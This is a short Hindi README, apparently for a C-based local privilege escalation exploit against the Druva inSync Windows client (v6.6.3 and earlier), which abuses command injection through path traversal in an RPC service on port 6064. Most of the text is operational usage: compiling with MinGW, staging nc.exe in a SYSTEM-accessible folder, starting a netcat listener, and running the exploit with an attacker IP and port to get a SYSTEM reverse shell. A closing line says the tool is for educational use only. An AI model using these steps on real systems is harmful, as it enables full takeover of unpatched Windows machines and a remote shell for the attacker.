
Druva के लिए स्थानीय विशेषाधिकार वृद्धि
Druva inSync विंडोज क्लाइंट (v6.6.3 और उससे नीचे) के लिए एक C-आधारित शोषण। एप्लिकेशन पोर्ट 6064 पर एक RPC सेवा प्रकट करता है जो पथ ट्रैवर्सल के माध्यम से कमांड इंजेक्शन के लिए संवेदनशील है। यह एक स्थानीय उपयोगकर्ता को NT AUTHORITY\SYSTEM के रूप में मनमानी कमांड निष्पादित करने की अनुमति देता है।
स्रोत कोड को संकलित करने के लिए gcc (MinGW) का उपयोग करें:
gcc exploit.c -o exploit.exe -lws2_32
SYSTEM खाते द्वारा सुलभ निर्देशिका में nc.exe की एक प्रति रखें (जैसे, C:\Windows\Tasks)।
अपने हमलावर मशीन पर एक लिसनर प्रारंभ करें:
nc -lvnp 4444
लक्ष्य विंडोज मशीन पर शोषण चलाएं:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
उदाहरण: exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
यह उपकरण केवल शैक्षिक उद्देश्यों के लिए है। उन प्रणालियों पर अनधिकृत उपयोग जिनके परीक्षण की अनुमति आपके पास नहीं है, अवैध है।